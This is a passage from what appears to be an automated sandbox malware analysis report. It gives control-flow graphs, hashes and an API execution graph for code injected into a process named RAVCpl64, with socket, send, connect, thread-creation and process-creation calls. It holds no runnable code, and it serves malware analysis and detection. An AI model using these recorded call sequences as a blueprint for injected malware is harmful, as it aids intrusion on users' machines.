3601e74-3601ea1 call 360d1a8 446->450 451 3601e6e-3601e72 446->451 447->440 448->418 452 3601ead-3601f7a call 360d178 call 36097b8 call 360a8c8 * 2 call 360d178 call 3609d68 call 360d368 449->452 450->449 451->450 451->452 470 3601f92-3601fbd 452->470 471 3601f7c-3601f80 452->471 473 36020b2-36020e0 call 3603f08 470->473 474 3601fc3-3601fc7 470->474 471->470 472 3601f82-3601f8f call 3603308 471->472 472->470 482 36020e2-36020e6 473->482 483 360211c-3602157 call 3609668 473->483 474->473 475 3601fcd-36020b0 call 360d5f8 * 3 call 360d368 * 2 call 360a8c8 * 2 474->475 475->482 485 3602267-3602276 call 360d368 482->485 486 36020ec-36020f0 482->486 483->440 497 36022f7-360232f call 35fc088 call 3609518 485->497 498 3602278 485->498 486->485 489 36020f6-360211a call 3603f38 486->489 489->483 501 360215c-36021de call 360d368 call 360d178 call 360d368 call 3609d68 call 360d368 * 3 489->501 517 3602331-3602347 497->517 518 360235b-360235f 497->518 502 3602282-36022e6 call 35fc088 call 360e548 call 3609668 498->502 559 36021e0-36021f6 call 360d368 call 360d178 501->559 560 36021fb-3602202 501->560 502->440 517->518 521 3602349-360234d 517->521 523 3602361-3602365 518->523 524 3602373-360238a 518->524 521->518 529 360234f-3602356 SleepEx 521->529 531 36024a5-36024e9 call 3609668 523->531 532 360236b-360236d 523->532 525 36023a8-360244c call 360d1a8 call 360d178 524->525 526 360238c-36023a2 524->526 553 3602492-360249f 525->553 554 360244e 525->554 526->525 526->531 529->531 531->440 542 36024eb-36024fd 531->542 532->524 532->531 542->440 545 3602500 call 360d1a8 542->545 545->440 553->531 554->553 556 3602450-3602455 554->556 556->553 558 3602457-3602490 556->558 558->553 558->554 559->560 561 3602204-360220d 560->561 562 360227a-360227f 560->562 564 360223c-3602251 561->564 565 360220f-3602218 561->565 562->502 564->497 571 3602257-3602262 564->571 569 360221a-3602226 565->569 570 360222d-3602236 565->570 569->570 570->564 572 36022eb-36022f4 570->572 571->497 572->497
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4eb37282e28ca9111a63178278a0956903f5347967684a0de788076bd221cc51
                                                                                          • Instruction ID: dd3bc7ac77466e6cf07108daee6b68c1b8f1ce7d945da38cd0c273e23cff87ec
                                                                                          • Opcode Fuzzy Hash: 4eb37282e28ca9111a63178278a0956903f5347967684a0de788076bd221cc51
                                                                                          • Instruction Fuzzy Hash: 7E91A2709186588FCB7DDF6CD4856EAB3E0FB59314F58066ED49EC3292EB309442CB45
                                                                                          Function 036000B8 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 573 36000b8-36000f7 574 36000fd-3600101 573->574 575 3600107-360010a 574->575 576 360018b-3600194 574->576 575->576 578 360010c-3600181 call 360d1a8 call 360d178 call 360d8e8 575->578 576->574 577 360019a-36001a3 576->577 579 36001a5-36001a9 577->579 580 36001df-36001fc 577->580 578->576 592 3600183-3600189 SleepEx 578->592 583 36001c4-36001cd 579->583 584 36001ab-36001b2 579->584 583->580 587 36001cf-36001d6 583->587 586 36001b8-36001c2 584->586 586->583 586->586 587->580 589 36001d8-36001d9 587->589 589->580 592->576
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: c82542470e893035ff55685a8bad2db84313f57e0b8586e2317f799d3919401b
                                                                                          • Instruction ID: 3a9634f0423e2b38010c9fb1d578b79d05b1165cc52bfe36020e5f59ec185b4a
                                                                                          • Opcode Fuzzy Hash: c82542470e893035ff55685a8bad2db84313f57e0b8586e2317f799d3919401b
                                                                                          • Instruction Fuzzy Hash: 6B31D57141CB488FCB2DDF4CD5C26EAB7E0FB85311F44069ED88A87256DB30AA4287D6
                                                                                          Function 0360AA52 Relevance: 1.6, APIs: 1, Instructions: 99libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 593 360aa52-360aa56 594 360a9f6-360aa09 call 360a518 593->594 595 360aa58-360aa82 call 360d708 593->595 604 360aa47-360aa51 594->604 605 360aa0b-360aa14 594->605 600 360aa84-360aa8e 595->600 601 360aa8f-360aa9b call 3610c18 595->601 608 360aaa9-360aabe call 360cef8 601->608 609 360aa9d-360aaa4 call 3610ee8 601->609 607 360aa18-360aa25 605->607 607->607 610 360aa27-360aa2b 607->610 616 360aac0-360aad5 LdrLoadDll 608->616 617 360aadc-360aae4 608->617 609->608 610->604 613 360aa2d-360aa31 610->613 615 360aa38-360aa45 613->615 615->604 615->615 616->617
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 5fb702872d600497e5f8e5facad51c3d4039d1ecc5d555099aea0abe3f2d8e1c
                                                                                          • Instruction ID: 8c3f3eae4908f07ae0f12e0644c72a54ed1c12cf732df47265da34be5cb02903
                                                                                          • Opcode Fuzzy Hash: 5fb702872d600497e5f8e5facad51c3d4039d1ecc5d555099aea0abe3f2d8e1c
                                                                                          • Instruction Fuzzy Hash: D3213831618B884FCB18EB64C5C967BB7D1FBD8341F48466ED88ECA1C0DA39D1858741
                                                                                          Function 03600943 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 618 3600943-3600945 619 3600921-360092d 618->619 620 3600967-3600970 618->620 619->620 621 360092f-360093f 619->621 622 3600990-36009bd call 35fc2f8 call 360c788 620->622 623 3600972-360097d call 360cfd8 620->623 632 36009f2-36009fc 622->632 633 36009bf-36009f1 call 36110db CreateThread 622->633 623->622 629 360097f-3600989 623->629 629->622
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 204ed3e27d091485ec6e3cbf90b59a87ad720546e6f0b9fe369c3626c9a58dce
                                                                                          • Instruction ID: 9e4963afb34a496c8d91b6eaa4a5f510c06edd0fc18cf2924e0e966f1686f978
                                                                                          • Opcode Fuzzy Hash: 204ed3e27d091485ec6e3cbf90b59a87ad720546e6f0b9fe369c3626c9a58dce
                                                                                          • Instruction Fuzzy Hash: 7211E63525C6444FEB4CDF68E086366B7D0EB95214F08466EC489CB1D2DA36D0428746
                                                                                          Function 03601598 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 636 3601598-36015d7 call 35fc2f8 call 360c788 641 36015d9 636->641 642 360164a-3601659 636->642 643 36015db-36015ed SleepEx 641->643 644 3601637-360163e 643->644 645 36015ef-36015f6 643->645 644->643 647 3601640-3601648 call 3601518 644->647 645->643 646 36015f8-3601609 645->646 646->643 648 360160b-3601611 646->648 647->643 648->643 650 3601613-3601615 648->650 650->643 652 3601617-3601628 call 3607b58 call 36000b8 650->652 656 360162d-3601635 call 3600208 652->656 656->643
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: ca4627703943177a91a5474a033625cf78bdd2fd46d432b306db316f6f39095d
                                                                                          • Instruction ID: 292c72be8b76fc2f976a0b784c082c05e8659de8f2fcb39aa812c6d423d23759
                                                                                          • Opcode Fuzzy Hash: ca4627703943177a91a5474a033625cf78bdd2fd46d432b306db316f6f39095d
                                                                                          • Instruction Fuzzy Hash: 33116674614B188FCB6AEF6885C666A72E1FB4A700F49057DD44BCB395CF3488418795
                                                                                          Function 03609473 Relevance: 1.6, APIs: 1, Instructions: 71networkCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 659 3609473-3609475 660 3609477-360947f 659->660 661 360944e-3609472 socket 659->661 662 3609481-36094a2 660->662 663 36094a5-36094c5 call 3606028 660->663 662->663 666 36094c7-36094e8 call 360c788 663->666 667 36094ee-36094f1 663->667 666->667 670 36094fa-3609509 667->670
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: socket
                                                                                          • String ID:
                                                                                          • API String ID: 98920635-0
                                                                                          • Opcode ID: 79686dfd957fdcf56bb0ae042f19e141827488ff6f2dd3c6a52b97d1487861fc
                                                                                          • Instruction ID: 5d52a2f17cd4ca3ae775e55496caa536ae853d69319a8bc248208a2883d95a50
                                                                                          • Opcode Fuzzy Hash: 79686dfd957fdcf56bb0ae042f19e141827488ff6f2dd3c6a52b97d1487861fc
                                                                                          • Instruction Fuzzy Hash: 1621813050C7488FCB94EF288085A9ABBE2FFA8311F44056EE889DB256DB70D454C756
                                                                                          Function 03609518 Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 671 3609518-3609569 call 36060c8 674 3609592-36095bd send 671->674 675 360956b-360958c call 360c788 671->675 675->674
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: send
                                                                                          • String ID:
                                                                                          • API String ID: 2809346765-0
                                                                                          • Opcode ID: bf482770b89144ae6d1a45bcd73b04a228f47aa333c6acd788d5bc3239fe2787
                                                                                          • Instruction ID: 91000b5c631cd3d1f48f1b26e56c0b18035336b8ab97cb7babc25149f0ac0c0c
                                                                                          • Opcode Fuzzy Hash: bf482770b89144ae6d1a45bcd73b04a228f47aa333c6acd788d5bc3239fe2787
                                                                                          • Instruction Fuzzy Hash: EE111F7051CB448FCB58EF18908965677E1FB58300F0405BEE85DCB29ADF709855CB9A
                                                                                          Function 036095BF Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 678 36095bf-3609608 679 3609611-3609619 678->679 680 360960c call 3606158 678->680 681 3609642-3609665 connect 679->681 682 360961b-360963c call 360c788 679->682 680->679 682->681
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: connect
                                                                                          • String ID:
                                                                                          • API String ID: 1959786783-0
                                                                                          • Opcode ID: 82a28c82e0c6822f755013061f54a29a7f7fda6ca5f3186a8a27344f82733e12
                                                                                          • Instruction ID: e40ef4965b9f7811ab26eb4377bfd598a194199222e67f12460a0be8f7fb5097
                                                                                          • Opcode Fuzzy Hash: 82a28c82e0c6822f755013061f54a29a7f7fda6ca5f3186a8a27344f82733e12
                                                                                          • Instruction Fuzzy Hash: 4611247051CB448FDB58EF18E0896567BE1FB58300F1405AEE94DCB29ADB70C454C796
                                                                                          Function 036095C8 Relevance: 1.6, APIs: 1, Instructions: 65networkCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 685 36095c8-3609619 call 3606158 688 3609642-3609665 connect 685->688 689 360961b-360963c call 360c788 685->689 689->688
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: connect
                                                                                          • String ID:
                                                                                          • API String ID: 1959786783-0
                                                                                          • Opcode ID: 422ce58a17fccc56f591c51909f80c148c9a7ba225ecfe7d487c759f121f4164
                                                                                          • Instruction ID: bd38f9e1e9ea4abe89b216c1b720e71f0284458eaa31fb4c95ff779b5a3c231e
                                                                                          • Opcode Fuzzy Hash: 422ce58a17fccc56f591c51909f80c148c9a7ba225ecfe7d487c759f121f4164
                                                                                          • Instruction Fuzzy Hash: B811333051CB448FDB58EF1CE08965677E1FB58300F0405AEE84DCB29ADB708454CB9A
                                                                                          Function 036093D8 Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 692 36093d8-3609428 call 3605f98 695 3609451-3609472 socket 692->695 696 360942a-360944b call 360c788 692->696 696->695
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: socket
                                                                                          • String ID:
                                                                                          • API String ID: 98920635-0
                                                                                          • Opcode ID: 5b60ab4d96bcea25efc04c9e258c72d939c50de38052d24f97de76961954b03f
                                                                                          • Instruction ID: 66f5f7aaff978e5f227b77721f61384f79258020f2bdc57c6eab5ac85d11091e
                                                                                          • Opcode Fuzzy Hash: 5b60ab4d96bcea25efc04c9e258c72d939c50de38052d24f97de76961954b03f
                                                                                          • Instruction Fuzzy Hash: 0E11007091CB448FCB58EF2C9089656B7E1FB58300F04067EE94DCB29ADB74D554CB9A
                                                                                          Function 03600948 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 699 3600948-3600970 701 3600990-36009bd call 35fc2f8 call 360c788 699->701 702 3600972-360097d call 360cfd8 699->702 710 36009f2-36009fc 701->710 711 36009bf-36009f1 call 36110db CreateThread 701->711 702->701 707 360097f-3600989 702->707 707->701
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0
                                                                                          • Opcode ID: cf2d9bbed089ef9e5af6be7edaeec47e0efd26030ac6f8f36c7cb1a3da89dfa4
                                                                                          • Instruction ID: a4f3d90eed07a6d1050359d876e536a7291583cba2aadce63bcac9a5aeb26054
                                                                                          • Opcode Fuzzy Hash: cf2d9bbed089ef9e5af6be7edaeec47e0efd26030ac6f8f36c7cb1a3da89dfa4
                                                                                          • Instruction Fuzzy Hash: 7311C474254B088FE788EF28C489767B7E0FB88304F48867DD449CB2A5DF75C4858792
                                                                                          Function 03609668 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 714 3609668-36096ad call 36061e8 717 36096d6-36096e9 closesocket 714->717 718 36096af-36096d0 call 360c788 714->718 718->717
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: closesocket
                                                                                          • String ID:
                                                                                          • API String ID: 2781271927-0
                                                                                          • Opcode ID: 8c92901066adabf54895dd4ad8737981fe93e10fd983c72b76368964cd09d6f7
                                                                                          • Instruction ID: d09e25d672805e15c4bb6a291dcc9f11acce3e0d955aedce523217e4e4f89159
                                                                                          • Opcode Fuzzy Hash: 8c92901066adabf54895dd4ad8737981fe93e10fd983c72b76368964cd09d6f7
                                                                                          • Instruction Fuzzy Hash: 2701253051CB489FDB84EF28D089BAAB7E1FF98300F44066EE88DC7255DB34C0548756

                                                                                          Non-executed Functions

                                                                                          Function 035FC4BE Relevance: .2, Instructions: 152COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 720b3c8800e1a7a464067fd415588fc944cb1e4f28e4051148543ba0d3f05397
                                                                                          • Instruction ID: f57b4de2dfa44fe2532867f912975e6198bae455681b4f166c0b46bcb1a9a844
                                                                                          • Opcode Fuzzy Hash: 720b3c8800e1a7a464067fd415588fc944cb1e4f28e4051148543ba0d3f05397
                                                                                          • Instruction Fuzzy Hash: 7441D675619B0D4FD72CEFA8E0816B7B3E6FB85300F54063DD986C7262EA70D8468789

                                                                                          Execution Graph

                                                                                          Execution Coverage:2.5%
                                                                                          Dynamic/Decrypted Code Coverage:3.3%
                                                                                          Signature Coverage:1.8%
                                                                                          Total number of Nodes:398
                                                                                          Total number of Limit Nodes:65
                                                                                          execution_graph 96061 2f229f0 LdrInitializeThunk 96062 679f63 96063 679f6f 96062->96063 96064 679f76 96063->96064 96066 68b960 96063->96066 96069 689be0 96066->96069 96068 68b979 96068->96064 96070 689bfd 96069->96070 96071 689c0e RtlFreeHeap 96070->96071 96071->96068 96072 66b7e0 96075 68b8d0 96072->96075 96074 66ce51 96078 6899d0 96075->96078 96077 68b901 96077->96074 96079 689a65 96078->96079 96081 6899fb 96078->96081 96080 689a7b NtAllocateVirtualMemory 96079->96080 96080->96077 96081->96077 96082 677660 96083 677678 96082->96083 96085 6776d2 96082->96085 96083->96085 96086 67b5d0 96083->96086 96087 67b5f6 96086->96087 96088 67b829 96087->96088 96107 689c70 96087->96107 96088->96085 96090 67b66c 96090->96088 96110 68cb30 96090->96110 96092 67b68b 96092->96088 96093 67b762 96092->96093 96116 688ea0 96092->96116 96096 675e80 LdrInitializeThunk 96093->96096 96106 67b781 96093->96106 96096->96106 96097 67b6f6 96097->96088 96098 67b74a 96097->96098 96099 67b728 96097->96099 96120 675e80 96097->96120 96126 678450 96098->96126 96123 684b20 96099->96123 96104 678450 LdrInitializeThunk 96105 67b81f 96104->96105 96105->96085 96106->96104 96108 689c8a 96107->96108 96109 689c9b CreateProcessInternalW 96108->96109 96109->96090 96111 68caa0 96110->96111 96112 68cafd 96111->96112 96130 68ba40 96111->96130 96112->96092 96114 68cada 96115 68b960 RtlFreeHeap 96114->96115 96115->96112 96117 688eba 96116->96117 96136 2f22b2a 96117->96136 96118 67b6ed 96118->96093 96118->96097 96121 675ebe 96120->96121 96139 689070 96120->96139 96121->96099 96124 678450 LdrInitializeThunk 96123->96124 96125 684b52 96124->96125 96125->96098 96127 678463 96126->96127 96145 688da0 96127->96145 96129 67848e 96129->96085 96133 689b90 96130->96133 96132 68ba5b 96132->96114 96134 689baa 96133->96134 96135 689bbb RtlAllocateHeap 96134->96135 96135->96132 96137 2f22b31 96136->96137 96138 2f22b3f LdrInitializeThunk 96136->96138 96137->96118 96138->96118 96140 689121 96139->96140 96141 68909f 96139->96141 96144 2f22c30 LdrInitializeThunk 96140->96144 96141->96121 96142 689166 96142->96121 96144->96142 96146 688e21 96145->96146 96147 688dce 96145->96147 96150 2f22cf0 LdrInitializeThunk 96146->96150 96147->96129 96148 688e46 96148->96129 96150->96148 96151 6710a0 96152 6710ba 96151->96152 96154 6710d8 96152->96154 96157 674890 96152->96157 96155 67110c PostThreadMessageW 96154->96155 96156 67111d 96154->96156 96155->96156 96158 6748b4 96157->96158 96159 6748bb 96158->96159 96160 6748f3 LdrLoadDll 96158->96160 96159->96154 96160->96159 96161 67fba0 96162 67fc04 96161->96162 96190 676610 96162->96190 96164 67fd3e 96165 67fd37 96165->96164 96197 676720 96165->96197 96167 67fee3 96168 67fdba 96168->96167 96169 67fef2 96168->96169 96201 67f980 96168->96201 96170 689870 NtClose 96169->96170 96172 67fefc 96170->96172 96173 67fdf6 96173->96169 96174 67fe01 96173->96174 96175 68ba40 RtlAllocateHeap 96174->96175 96176 67fe2a 96175->96176 96177 67fe33 96176->96177 96178 67fe49 96176->96178 96179 689870 NtClose 96177->96179 96210 67f870 CoInitialize 96178->96210 96181 67fe3d 96179->96181 96182 67fe57 96213 689310 96182->96213 96184 67fed2 96217 689870 96184->96217 96186 67fedc 96187 68b960 RtlFreeHeap 96186->96187 96187->96167 96188 67fe75 96188->96184 96189 689310 LdrInitializeThunk 96188->96189 96189->96188 96191 676643 96190->96191 96192 676667 96191->96192 96220 6893c0 96191->96220 96192->96165 96194 67668a 96194->96192 96195 689870 NtClose 96194->96195 96196 67670a 96195->96196 96196->96165 96198 676745 96197->96198 96225 6891c0 96198->96225 96202 67f99c 96201->96202 96203 674890 LdrLoadDll 96202->96203 96205 67f9ba 96203->96205 96204 67f9c3 96204->96173 96205->96204 96206 674890 LdrLoadDll 96205->96206 96207 67fa8e 96206->96207 96208 674890 LdrLoadDll 96207->96208 96209 67fae8 96207->96209 96208->96209 96209->96173 96212 67f8d5 96210->96212 96211 67f96b CoUninitialize 96211->96182 96212->96211 96214 68932d 96213->96214 96230 2f22ac0 LdrInitializeThunk 96214->96230 96215 68935d 96215->96188 96218 68988a 96217->96218 96219 68989b NtClose 96218->96219 96219->96186 96221 6893dd 96220->96221 96224 2f22bc0 LdrInitializeThunk 96221->96224 96222 689409 96222->96194 96224->96222 96226 6891da 96225->96226 96229 2f22b80 LdrInitializeThunk 96226->96229 96227 6767b9 96227->96168 96229->96227 96230->96215 96231 68ca60 96232 68b960 RtlFreeHeap 96231->96232 96233 68ca75 96232->96233 96234 6804a0 96235 6804c3 96234->96235 96236 674890 LdrLoadDll 96235->96236 96237 6804e7 96236->96237 96238 681ea0 96239 681eb9 96238->96239 96240 681f01 96239->96240 96243 681f41 96239->96243 96245 681f46 96239->96245 96241 68b960 RtlFreeHeap 96240->96241 96242 681f11 96241->96242 96244 68b960 RtlFreeHeap 96243->96244 96244->96245 96246 689560 96247 68961a 96246->96247 96249 689592 96246->96249 96248 689630 NtCreateFile 96247->96248 96250 669df0 96251 669dff 96250->96251 96252 669e40 96251->96252 96253 669e2d CreateThread 96251->96253 96264 678b3b 96265 678b45 96264->96265 96267 678ab6 96265->96267 96268 677400 96265->96268 96269 67744f 96268->96269 96270 677416 96268->96270 96269->96267 96270->96269 96272 677270 LdrLoadDll 96270->96272 96272->96269 96274 677480 96275 67749c 96274->96275 96278 6774ef 96274->96278 96277 689870 NtClose 96275->96277 96275->96278 96276 677627 96279 6774b7 96277->96279 96278->96276 96285 6768a0 NtClose LdrInitializeThunk LdrInitializeThunk 96278->96285 96284 6768a0 NtClose LdrInitializeThunk LdrInitializeThunk 96279->96284 96281 677601 96281->96276 96286 676a70 NtClose LdrInitializeThunk LdrInitializeThunk 96281->96286 96284->96278 96285->96281 96286->96276 96287 67c940 96288 67c969 96287->96288 96289 67ca6d 96288->96289 96290 67ca13 FindFirstFileW 96288->96290 96290->96289 96292 67ca2e 96290->96292 96291 67ca54 FindNextFileW 96291->96292 96293 67ca66 FindClose 96291->96293 96292->96291 96293->96289 96294 672a8c 96295 672ab8 96294->96295 96296 676610 2 API calls 96295->96296 96297 672ac3 96296->96297 96300 669e50 96303 66a0d2 96300->96303 96302 66a5a3 96303->96302 96304 68b5a0 96303->96304 96305 68b5c4 96304->96305 96310 664060 96305->96310 96307 68b5e3 96308 68b61c 96307->96308 96313 6859a0 96307->96313 96308->96302 96317 673540 96310->96317 96312 66406d 96312->96307 96314 685a01 96313->96314 96316 685a0e 96314->96316 96353 671ce0 96314->96353 96316->96308 96319 67355d 96317->96319 96318 673576 96318->96312 96319->96318 96324 68a2b0 96319->96324 96321 6735d1 96321->96318 96331 686100 96321->96331 96323 673622 96323->96312 96326 68a2ca 96324->96326 96325 68a2f9 96325->96321 96326->96325 96327 688ea0 LdrInitializeThunk 96326->96327 96328 68a359 96327->96328 96329 68b960 RtlFreeHeap 96328->96329 96330 68a372 96329->96330 96330->96321 96332 686165 96331->96332 96333 686190 96332->96333 96336 6731b0 96332->96336 96333->96323 96335 686172 96335->96323 96338 6731be 96336->96338 96337 67319c 96337->96335 96338->96337 96342 6780d0 96338->96342 96341 689870 NtClose 96341->96337 96343 673443 96342->96343 96344 6780ea 96342->96344 96343->96337 96343->96341 96348 688f40 96344->96348 96347 689870 NtClose 96347->96343 96349 688f5a 96348->96349 96352 2f234e0 LdrInitializeThunk 96349->96352 96350 6781ba 96350->96347 96352->96350 96354 671d1b 96353->96354 96369 6781e0 96354->96369 96356 671d23 96357 68ba40 RtlAllocateHeap 96356->96357 96367 672006 96356->96367 96358 671d39 96357->96358 96359 68ba40 RtlAllocateHeap 96358->96359 96360 671d4a 96359->96360 96361 68ba40 RtlAllocateHeap 96360->96361 96363 671d5b 96361->96363 96368 671df2 96363->96368 96384 676d70 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96363->96384 96364 674890 LdrLoadDll 96365 671fb2 96364->96365 96380 6882e0 96365->96380 96367->96316 96368->96364 96370 67820c 96369->96370 96371 6780d0 2 API calls 96370->96371 96372 67822f 96371->96372 96373 678251 96372->96373 96374 678239 96372->96374 96375 67826d 96373->96375 96378 689870 NtClose 96373->96378 96376 678244 96374->96376 96377 689870 NtClose 96374->96377 96375->96356 96376->96356 96377->96376 96379 678263 96378->96379 96379->96356 96381 688342 96380->96381 96383 68834f 96381->96383 96385 672020 96381->96385 96383->96367 96384->96368 96401 6784b0 96385->96401 96387 6725a3 96387->96383 96388 672040 96388->96387 96405 6814d0 96388->96405 96391 672254 96393 68cb30 2 API calls 96391->96393 96392 67209e 96392->96387 96408 68ca00 96392->96408 96396 672269 96393->96396 96394 678450 LdrInitializeThunk 96395 6722b9 96394->96395 96395->96387 96395->96394 96398 670b20 LdrInitializeThunk 96395->96398 96396->96395 96413 670b20 96396->96413 96398->96395 96399 672413 96399->96395 96400 678450 LdrInitializeThunk 96399->96400 96400->96399 96402 6784bd 96401->96402 96403 6784e5 96402->96403 96404 6784de SetErrorMode 96402->96404 96403->96388 96404->96403 96406 68b8d0 NtAllocateVirtualMemory 96405->96406 96407 6814f1 96406->96407 96407->96392 96409 68ca10 96408->96409 96410 68ca16 96408->96410 96409->96391 96411 68ba40 RtlAllocateHeap 96410->96411 96412 68ca3c 96411->96412 96412->96391 96414 670b3d 96413->96414 96417 689af0 96414->96417 96418 689b0d 96417->96418 96421 2f22b90 LdrInitializeThunk 96418->96421 96419 670b42 96419->96399 96421->96419 96422 67b090 96427 67ada0 96422->96427 96424 67b09d 96441 67aa20 96424->96441 96426 67b0b9 96428 67adc5 96427->96428 96452 6786c0 96428->96452 96431 67af13 96431->96424 96433 67af2a 96433->96424 96434 67af21 96434->96433 96436 67b017 96434->96436 96471 67a470 96434->96471 96438 67b07a 96436->96438 96480 67a7e0 96436->96480 96439 68b960 RtlFreeHeap 96438->96439 96440 67b081 96439->96440 96440->96424 96442 67aa36 96441->96442 96445 67aa41 96441->96445 96443 68ba40 RtlAllocateHeap 96442->96443 